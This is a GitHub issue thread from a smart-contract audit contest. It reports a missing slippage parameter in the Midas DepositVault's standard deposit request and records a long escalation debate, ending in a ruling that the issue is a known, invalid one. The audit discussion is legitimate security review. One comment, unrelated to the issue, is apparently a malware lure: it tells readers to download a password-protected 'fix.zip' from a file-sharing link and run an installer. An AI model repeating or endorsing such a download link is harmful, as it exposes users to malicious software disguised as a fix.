### ISSUE TITLE
pkqs90 - No slippage parameter for standard deposit request.

### ISSUE THREAD

**Issue by sherlock-admin4** [sherlock-audit/2024-08-midas-minter-redeemer-judging#104]
pkqs90

Medium

# No slippage parameter for standard deposit request.

## Summary

No slippage parameter for standard deposit request. Users may receive less mTokens than they expect.

## Vulnerability Detail

When users are depositing tokens to acquire mTokens, there are two paths: 1) instant deposit, 2) standard deposit.

- During instant deposit, users will receive mTokens immediately, based on the inToken and mToken rate at the time.
- During standard deposit, users will need to wait for admins to approve the request.

Users may fallback to using a standard deposit if the daily limit is hit for instant deposit.

The issue here is that there is a slippage parameter limiting the amount of mTokens users receive for instant deposit, but not for standard deposit. This is an issue, especially considering the tokenIn rate is calculated during the deposit request transaction, and that there is no slippage parameter to control it. Example:

1. User calls `depositRequest()` to deposit WBTC for mToken.
2. The deposit transaction takes a while to process, and WBTC price crashes during the time (and recovers later).
3. The transaction is processed, but the `tokenInRate` is now much lower than when the user initiated the deposit. This will lead to users receiving less mToken in the end.

During the process, there is no mechanism for user to set a slippage parameter nor cancel the request.

Note that the specs did not mention slippage is required for standard deposit. However, this doesn't mean it doesn't pose a vulnerability.

```solidity
    function depositRequest(
        address tokenIn,
        uint256 amountToken,
        bytes32 referrerId
    )
        external
        whenFnNotPaused(this.depositRequest.selector)
        onlyGreenlisted(msg.sender)
        onlyNotBlacklisted(msg.sender)
        onlyNotSanctioned(msg.sender)
        returns (uint256 requestId)
    {
        address user = msg.sender;

        address tokenInCopy = tokenIn;
        uint256 amountTokenCopy = amountToken;
        bytes32 referrerIdCopy = referrerId;

        uint256 currentId = currentRequestId.current();
        requestId = currentId;
        currentRequestId.increment();

        (
            uint256 tokenAmountInUsd,
            uint256 feeAmount,
            uint256 amountTokenWithoutFee,
            ,
@>          uint256 tokenInRate,
            uint256 tokenOutRate,
            uint256 tokenDecimals
        ) = _calcAndValidateDeposit(user, tokenInCopy, amountTokenCopy, false);

        _tokenTransferFromUser(
            tokenInCopy,
            tokensReceiver,
            amountTokenWithoutFee,
            tokenDecimals
        );

        if (feeAmount > 0)
            _tokenTransferFromUser(
                tokenInCopy,
                feeReceiver,
                feeAmount,
                tokenDecimals
            );

        mintRequests[currentId] = Request({
            sender: user,
            tokenIn: tokenInCopy,
            status: RequestStatus.Pending,
            depositedUsdAmount: tokenAmountInUsd,
@>          usdAmountWithoutFees: (amountTokenWithoutFee * tokenInRate) /
                10**18,
            tokenOutRate: tokenOutRate
        });

        emit DepositRequest(
            currentId,
            user,
            tokenInCopy,
            tokenAmountInUsd,
            feeAmount,
            tokenOutRate,
            referrerIdCopy
        );
    }
```

## Impact

Users may receive less mTokens than they expect.

## Code Snippet

- https://github.com/sherlock-audit/2024-08-midas-minter-redeemer/blob/main/midas-contracts/contracts/DepositVault.sol#L148

## Tool used

Manual Review

## Recommendation

Also add a slippage parameter for standard deposits to limit the minimum amount of mToken received.

When admins approve the deposit request, check the amount of mTokens against the number. If it is impossible to fulfill the request, the admin can just reject the request.

**Comment by yiweifengyan** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ReyAdmiradoo** [comment]
Escalate

From known issues in the README:
> the fees/exchange rates that are evolving between the standard request, and the processing are not a bug.

The exchange rate (price) being changed after the standard request is known, so it should not be considered a valid M/H.

**Comment by sherlock-admin3** [comment]
> Escalate
> 
> From known issues in the README:
> > the fees/exchange rates that are evolving between the standard request, and the processing are not a bug.
> 
> The exchange rate (price) being changed after the standard request is known, so it should not be considered a valid M/H.

You've created a valid escalation!

To remove the escalation from consideration: Delete your comment.

You may delete or edit your escalation comment anytime before the 48-hour escalation window closes. After that, the escalation becomes final.

**Comment by 0xRandluck** [comment]
This issue is not about exchange rate change between create request and approve request time, it's about changing exchange rate between create request time and the time that transaction for create request has been processed

**Comment by z3s** [comment]
> it's about changing exchange rate between create request time and the time that transaction for create request has been processed

that's exactly what known issues' statement says:
> the fees/exchange rates that are evolving between the standard request, and the processing are not a bug.

**Comment by z3s** [comment]
> it's about changing exchange rate between create request time and the time that transaction for create request has been processed

Isn't this exactly what known issues' statement says?
> the fees/exchange rates that are evolving between the standard request, and the processing are not a bug.

**Comment by ReyAdmiradoo** [comment]
> This issue is not about exchange rate change between create request and approve request time, it's about changing exchange rate between create request time and the time that transaction for create request has been processed

I believe what README clearly states that after the standard request is submitted by the user, any change in price should be accepted by the user, and anytime after the request have been submitted to it being approved is called the processing time.

> the fees/exchange rates that are evolving between the standard request, and the processing are not a bug.

of course adding slippage protection is very helpful for the user, but this is a known issue to the protocol team and should not be rewarded.

**Comment by pkqs90** [comment]
This issue talks about the uncertainty of tx execution time due to the nature of blockchain. For example, user provides a low gas fee and the tx queues 6 hours before execution, and by that time the token price already changes a lot. A simple "deadline" parameter can help solve this case, if setting a slippage for the min required mToken is too complicated (since it also involves the mToken rate at approval time).

The words from readme talks about the exchange rate between "user request -> admin approval", and not the tx queue period.

*P.S: This escalation could easily turn into how to intepret the words of the readme, which is very subjective. Best to let HoJ make the call if that happens.*

**Comment by underdog-sec** [comment]
As mentioned in [this comment](https://github.com/sherlock-audit/2024-08-midas-minter-redeemer-judging/issues/104#issuecomment-2325747376) and  [this comment](https://github.com/sherlock-audit/2024-08-midas-minter-redeemer-judging/issues/104#issuecomment-2325822588), the README clearly states that changes in exchange rates (all of them) between deposit request and approval can't be submitted as an issue. 

Of course the transaction being delayed will make it be submitted later and the exchange rate could change, but it would be an issue on the user's end for not setting the adequate gas limit for the transaction. The price could also change a lot between a request submitted with the adequate gas limit and its approval if for example a black swan event occurred between the transaction submission and its execution, but this occurring is well known by the protocol team as clearly mentioned in the README, and is a design decision. In the end, it's an issue related to changes in exchange rates, which are clearly mentioned to be out of scope.

We could extrapolate this issue to lending protocols, for example, and say that all of such protocols which don't include a deadline parameter in their borrow functions have a DoS vulnerability, because if users submit a `borrow` request with a low gas limit, the exchange rate for their collateral can decrease between txn submission and its execution, making the `borrow` transaction be DoS'ed due to the reduced value of the collateral. Or maybe transaction still goes through but the user ends up with a position with a lower health factor than expected. In the end, it's an issue on the user's end for not setting the gas limit adequately.

Even if this happened in Midas, the deposit request still needs to be accepted by Midas admins. If the slippage is too big so that it negatively impacts the user after submitting the deposit request, the admin can always reject the request instead of approving it, preventing the user from being affected from the slippage caused by the change in rate.

**Comment by ReyAdmiradoo** [comment]
@pkqs90 

README stated this:

> the fees/exchange rates that are evolving between the standard request, and the processing are not a bug.

the time between request and processing (which i believe would cover the tx queue to execution as well, based on the wording used here).

but I also agree it's about how you interpret the statement.

will wait for @WangSecurity verdict for this one.

**Comment by 0xAadi** [comment]
[Edit: These statements are not applicable in this issue. Apologies for the misunderstanding.]
Two more points need to be considered when evaluating this issue:

1. The Vault Admin can reject the request if there is a significant discrepancy.
2. The Vault Admin can use [`safeApproveRequest()`](https://github.com/sherlock-audit/2024-08-midas-minter-redeemer/blob/52b77ba39be51f18a5b0736dfbe7f2acbbeba6e3/midas-contracts/contracts/DepositVault.sol#L219) to apply the [`variationTolerance`](https://github.com/sherlock-audit/2024-08-midas-minter-redeemer/blob/52b77ba39be51f18a5b0736dfbe7f2acbbeba6e3/midas-contracts/contracts/DepositVault.sol#L316C1-L317C74) to avoid the deviation risks.

**Comment by novaman33** [comment]
I would also like to add that an oracle is used to calculate the out token amount. There is no way for the user to know how much they will be redeemed because no amount is returned. So the user basically blindly redeems and does not know what to expect.

**Comment by WangSecurity** [comment]
I see there's misunderstanding from the following line in README:
> Fees and exchange rates: the fees/exchange rates that are evolving between the standard request, and the processing are not a bug.

Some Watsons say it's about the price change between the making a request and the admin approving it, but as I understand, it's clear the line talks about the price (exchange rate) difference between making a request and **processing it**, not admin approving the request.

And this report talks exactly about this:
> The deposit transaction takes a while to process, and WBTC price crashes during the time (and recovers later).
The transaction is processed, but the tokenInRate is now much lower than when the user initiated the deposit.

Hence, I believe this issue is indeed known and should be invalid. Of course, if my understanding is incorrect here, please correct me. But, the initial decision is to invalidate this issue and accept the escalation.

**Comment by 0xRandluck** [comment]
I think the following line considers approving request by admin as the process of the request and it doesn't anything to do with processing the transaction:  Fees and exchange rates: the fees/exchange rates that are evolving between the standard request, and the processing are not a bug.

**Comment by pkqs90** [comment]
@WangSecurity Maybe I wasn't clear enough. So there are 3 phases:

1. User initiates deposit TX (calls `depositRequest()`)
2. Deposit TX gets executed by blockchain, and gets assigned a requestId
3. Admin approves the requestId

This issue talks about the rate diff between [1, 2] (caused by blockchain latency), and not [2, 3] (caused by async admin approval). My understanding is that the README "Fees and exchange rates: the fees/exchange rates that are evolving between the standard request, and the processing are not a bug" is about the rate diff between [2, 3] being a known issue, and does not mean [1, 2].

Just want to make sure we're aligned.

**Comment by WangSecurity** [comment]
Thank you @pkqs90 and indeed I thought the report was about the period of [1,3]. But, unfortunately, the line in the known issues q inside README is indeed about the entire process from 1 to 3 and there's intentionally no slippage check for standard deposits/redemptions and they're applied only to instant versions. Therefore, this issue should be invalid as a known issue, planning to accept the escalation.

> *Note: in future situations like this, where it's not entirely clean what certain answers in the README me, every Watson is more than welcome to contact me and tell me about it. Unfortunately, we cannot catch all the ambiguous answers before the context due to not understanding the codebase deeply, so we need to work in cooperation so we can prevent such situations where Watsons understand the same answer differently. Hope for your understanding*

**Comment by blockchain555** [comment]
@WangSecurity I think the following line considers approving request by admin as the process of the request and it doesn't anything to do with processing the transaction: Fees and exchange rates: the fees/exchange rates that are evolving between the standard request, and the processing are not a bug.

**Comment by novaman33** [comment]
@WangSecurity 
I really think that it is clear sponsors meant only the period of [2,3] as this requires admin actions. After all the whole redeem function calculates fees and exchange rates. If they included [1,3] wouldn't it mean that all the fee calculations and the exchange rates in the redeem and deposit functions (which are almost what the whole audit is about) are out of scope? As for this issue the request function does not have any slippage protection, which would be needed as the admins only specify the rate of the mTokens. However the chainlink outToken rate is used during the execution of the redeemRequest transaction (where the slippage protection is needed) so the protocol is indeed not accounting for the slippage.  The lack of slippage protection will surely lead to loss of funds for users which will make the protocol unreliable. For me what is meant by the readMe is clear as day and this escalation is just an attempt to twist the readMe in order to profit other issues. 
Furthermore, the escalation states the following "The exchange rate (price) being changed after the standard request is known, so it should not be considered a valid M/H." while in fact the slippage issue happens during the standard request, not after it is submitted.

**Comment by WangSecurity** [comment]
@blockchain555 thank you for re-iterating, but indeed this line is about the whole process, i.e. [1,3] as I've explained in the previous comment.

@novaman33 I understand, but the slippage protection is intentionally not applied in the standard deposits/redemptions, that's why the following line was included in the README. The slippage protection is intended only for instant mints/redemptions. 

The decision remains the same, accept the escalation and invalidate the issue.

**Comment by novaman33** [comment]
@WangSecurity ,
The readMe states the following:
"Fees and exchange rates: the fees/exchange rates that are evolving between the standard request, and the processing are not a bug."
Herethe use of the word "between" refers to the period of time that separates the two transactions: the `redeemRequest` and the `approveRequest`.
However the slippage happens in the first transaction not between them.
I would 100% agree with you if the readMe stated:
"Fees and exchange rates: the fees/exchange rates that are evolving IN the standard request, and the processing are not a bug."
As it would indeed be a known issue, but the sentence that was used in the readMe is clearly about the processing at a different mToken rate(which will be inputed in the time of processing), not about the out token rate, which is specified in the time of the `redeemRequest` before a request id is assigned.
I see no evidence to support the claim that the slippage is a known issue. I also cannot understand how such a straightforward sentence from the readMe can be misinterpreted in so many ways.
Could you please tell me what part of the sentence made you decide it was a known issue and how you understand this part of the README?

**Comment by 0xRandluck** [comment]
> Thank you @pkqs90 and indeed I thought the report was about the period of [1,3]. But, unfortunately, the line in the known issues q inside README is indeed about the entire process from 1 to 3 and there's intentionally no slippage check for standard deposits/redemptions and they're applied only to instant versions. Therefore, this issue should be invalid as a known issue, planning to accept the escalation.
> 
> > _Note: in future situations like this, where it's not entirely clean what certain answers in the README me, every Watson is more than welcome to contact me and tell me about it. Unfortunately, we cannot catch all the ambiguous answers before the context due to not understanding the codebase deeply, so we need to work in cooperation so we can prevent such situations where Watsons understand the same answer differently. Hope for your understanding_

This is the context of the report which clearly talks about step 1 ans 2 not step 3 of the process, I think this issue should be valid :

> 1 - User calls depositRequest() to deposit WBTC for mToken.
2 - The deposit transaction takes a while to process, and WBTC price crashes during the time (and recovers later).
3 - The transaction is processed, but the tokenInRate is now much lower than when the user initiated the deposit. This will lead to users receiving less mToken in the end.

**Comment by WangSecurity** [comment]
> The readMe states the following:
"Fees and exchange rates: the fees/exchange rates that are evolving between the standard request, and the processing are not a bug."
Herethe use of the word "between" refers to the period of time that separates the two transactions: the redeemRequest and the approveRequest.
However the slippage happens in the first transaction not between them.


As I've said, this statement in the README is **not** about the period between the standard deposit is executed and then approved, it's about the entire period of the standard deposit being submitted, processed and then approved, as I've tried to explain several times.

> I would 100% agree with you if the readMe stated:
"Fees and exchange rates: the fees/exchange rates that are evolving IN the standard request, and the processing are not a bug."
As it would indeed be a known issue, but the sentence that was used in the readMe is clearly about the processing at a different mToken rate(which will be inputed in the time of processing), not about the out token rate, which is specified in the time of the redeemRequest before a request id is assigned.

I agree it would've been clearer with that wording and excuse me for missing it before the contest, but as I've explained in the previous comments and above, this line in the README refers to the entire process.

> I see no evidence to support the claim that the slippage is a known issue. I also cannot understand how such a straightforward sentence from the readMe can be misinterpreted in so many ways.

Unfortunately, it's how humans work and that we can understand the same thing differently. My understanding (as it was initially) is that this report indeed falls under this line of the README and, moreover, I then confirmed with the team that this line of the README is specifically about not implementing the slippage parameter in the request functions. But, as I've said earlier, I agree it could've been made clearer.

> Could you please tell me what part of the sentence made you decide it was a known issue and how you understand this part of the README?

Well, the sentence as a whole made me understand it's known that the price can evolve between the standard process being submitted and then processed. To clarify, as you can see in my initial comment, my understanding was that this line is exactly about the price changing between submitting the request and then it being executed. But, I see that some of the Watsons think it refers to the period between the request being executed and later approved. Hence, I confirmed which understanding is correct and the answer was that this line in the README is exactly about not adding the slippage parameter and that it's known.

> This is the context of the report which clearly talks about step 1 ans 2 not step 3 of the process, I think this issue should be valid :

As I've said earlier, this line in README is about the entire process, therefore, it should be invalid. 

Planning to accept the escalation and invalidate the issue.

**Comment by novaman33** [comment]
@WangSecurity 
Here:
"that the price can evolve between the standard process being submitted and then processed"
extracted from your comment what exactly are you referring to when saying "the price"?
Just to make sure we are on the same page will give the following example: 
1.Alice call redeemRequest in 1pm.
2. Due to the nature of the blockchain and because it has been busy at that period Alice's transaction is executed in 2pm(the redeemRequest). Here the slippage parameter would prevent Alice from bad rate as the out token rate is taken in the redeemRequest.
3.At 4pm an admin calls approveRequest and they input the mToken rate. The out token rate will be from the 2pm transaction.
This issue talks about the rate change of out tokens between 1pm and 2pm, not the mToken rate change that evolves between the standard request(at 2pm) and the processing (at 4pm). 
Could you please quote what exactly you asked the sponsor's and what their answer was, if it is not confidential?

**Comment by WangSecurity** [comment]
> Here:
"that the price can evolve between the standard process being submitted and then processed"
extracted from your comment what exactly are you referring to when saying "the price"?

When I say "the price" I refer to how much the token costs. For example, if 1 BTC costs $60k then the price of BTC is $60k. I treat the exchange rate in the same way and use "the price" and "the exchange rate" interchangeably, if it's the question. And excuse me if I didn't understand the question correctly.

> Just to make sure we are on the same page will give the following example:
1.Alice call redeemRequest in 1pm.
> 2. Due to the nature of the blockchain and because it has been busy at that period Alice's transaction is executed in 2pm(the redeemRequest). Here the slippage parameter would prevent Alice from bad rate as the out token rate is taken in the redeemRequest.
> 3.At 4pm an admin calls approveRequest and they input the mToken rate. The out token rate will be from the 2pm transaction.
This issue talks about the rate change of out tokens between 1pm and 2pm, not the mToken rate change that evolves between the standard request(at 2pm) and the processing (at 4pm).

Yes, I understand, and it was mentioned several times in the discussion above, so no need to repeat it.

> Could you please quote what exactly you asked the sponsor's and what their answer was, if it is not confidential?

If you want, then yes. My question was:
> Additionally, would be interested in your opinion about [this report](https://github.com/sherlock-audit/2024-08-midas-minter-redeemer-judging/issues/104)
Is it what you meant by the following line in known issues:
> > Fees and exchange rates: the fees/exchange rates that are evolving between the standard request, and the processing are not a bug.

And the reply:
> For 104 I guess yes, as Romain previously said: `Not having the slippage parameter on the standard deposit/redeem is by design. This was only added for instant functions on purpose`.

Note: both the question and reply were made after the sponsor have set the labels on the issue.

Hope that clears your concerns, the decision remains, accept the escalation and invalidate the issue.

**Comment by novaman33** [comment]
@WangSecurity Sorry if I repeated myself, just wanted to make sure we were on the same page. As for the README sentence I still believe it is being misinterpreted in this issue. It would be a good idea for future contests to give code references and examples in the known issues section in order to prevent such issues of being unfairly invalidated. Thank you for the patience.

**Comment by WangSecurity** [comment]
Fair point, that's why in one of my comments, I've asked Watsons to reach out to me in case some lines in README can be interpreted in several ways. But, unfortunately, the case here is exactly what's meant by the README.

Hence, the decision remains, accept the escalation and invalidate the issue.

**Comment by WangSecurity** [comment]
Result:
Invalid
Has duplicates

**Comment by sherlock-admin4** [comment]
Escalations have been resolved successfully!

Escalation status:
- [ReyAdmiradoo](https://github.com/sherlock-audit/2024-08-midas-minter-redeemer-judging/issues/104/#issuecomment-2325030394): accepted
